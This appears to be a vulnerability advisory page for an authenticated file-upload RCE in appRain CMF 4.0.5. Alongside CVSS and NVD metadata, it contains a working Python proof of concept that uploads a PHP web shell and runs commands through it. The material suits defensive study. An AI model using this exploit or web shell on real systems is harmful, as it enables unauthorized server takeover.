Security Vulnerability Report
CVE-2024-58279 CVSS 8.8 HIGH

CVE-2024-58279

Published: 2025-12-10 22:16:20
Last Modified: 2025-12-19 17:53:02

Description

appRain CMF 4.0.5 contains an authenticated remote code execution vulnerability that allows administrative users to upload malicious PHP files through the filemanager upload endpoint. Attackers can leverage authenticated access to generate a web shell with command execution capabilities by uploading a crafted PHP file to the site's uploads directory.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apprain:apprain:4.0.5:*:*:*:*:*:*:* - VULNERABLE
appRain CMF 4.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2024-58279: appRain CMF 4.0.5 Authenticated RCE via FileManager Upload
#
# Proof of concept, reformatted for readability. Every request below is an
# indicator a defender can look for in web-server and application logs:
#   1. POST /admin/login with an admin credential
#   2. POST /admin/filemanager/upload carrying a multipart field "file" whose
#      filename ends in .php (here "shell.php", content type application/x-php)
#   3. GET /uploads/shell.php?cmd=... from the same session
# The root cause is tracked as CWE-434 on this page (unrestricted upload of a
# dangerous file type): the upload endpoint accepts a PHP file and stores it
# under a web-served path. The generic mitigation is server-side validation of
# uploaded names/types and storing uploads where the web server does not
# execute scripts. Note that this script never deletes shell.php, so an
# authorized test leaves the artifact in place until it is cleaned up.

target_url: str = "http://target.com"  # Replace with target URL
username: str = "admin"  # Replace with valid admin username
password: str = "admin123"  # Replace with valid admin password

# Login to get authenticated session. The vulnerability requires a valid
# account, so credential hygiene and admin-login monitoring are the first
# line of defence.
session = requests.Session()
login_url: str = f"{target_url}/admin/login"
login_data: dict[str, str] = {
    "username": username,
    "password": password
}
response = session.post(login_url, data=login_data)

# As written, this only aborts when BOTH the body lacks "success" AND the
# status is not 200; the script relies on the upload step to surface failures.
if "success" not in response.text.lower() and response.status_code != 200:
    print("[-] Login failed")
    sys.exit(1)

print("[+] Login successful")

# Prepare malicious PHP file (webshell). The payload string itself is a
# useful detection signature for upload inspection and file-integrity tools.
php_payload: str = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

# Multipart form field expected by the filemanager endpoint:
# (filename, file content, content type).
files: dict[str, tuple[str, str, str]] = {
    "file": ("shell.php", php_payload, "application/x-php")
}

# Upload the malicious file via FileManager endpoint. Only the HTTP status is
# checked; a 200 response is treated as a successful write to /uploads.
upload_url: str = f"{target_url}/admin/filemanager/upload"
response = session.post(upload_url, files=files)

if response.status_code == 200:
    print("[+] Malicious PHP file uploaded successfully")
    # Attempt to execute command. If the uploads directory does not execute
    # PHP, the response is the raw payload text rather than command output.
    shell_url: str = f"{target_url}/uploads/shell.php?cmd=whoami"
    shell_response = session.get(shell_url)
    print(f"[+] Command output: {shell_response.text}")
else:
    print("[-] Upload failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58279", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:19.543", "lastModified": "2025-12-19T17:53:02.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "appRain CMF 4.0.5 contains an authenticated remote code execution vulnerability that allows administrative users to upload malicious PHP files through the filemanager upload endpoint. Attackers can leverage authenticated access to generate a web shell with command execution capabilities by uploading a crafted PHP file to the site's uploads directory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apprain:apprain:4.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "C45A573A-FE6F-4BD2-ACFD-6F5D673F2B11"}]}]}], "references": [{"url": "https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.apprain.org", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52041", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/apprain-cmf-authenticated-remote-code-execution-via-filemanager-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}